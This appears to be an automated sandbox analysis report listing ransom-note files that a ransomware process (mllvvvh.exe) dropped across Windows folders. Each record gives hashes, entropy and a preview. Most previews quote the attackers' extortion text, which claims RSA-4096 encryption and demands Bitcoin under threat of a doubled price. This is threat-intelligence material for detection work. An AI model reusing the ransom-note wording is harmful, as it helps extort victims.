                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\SoftwareDistribution\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\SoftwareDistribution\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\SoftwareDistribution\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\USOPrivate\UpdateStore\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\USOPrivate\UpdateStore\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\USOPrivate\UpdateStore\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\USOPrivate\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\USOPrivate\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\USOPrivate\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\USOShared\Logs\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\USOShared\Logs\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\USOShared\Logs\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\USOShared\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\USOShared\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\USOShared\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\WindowsHolographicDevices\SpatialStore\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
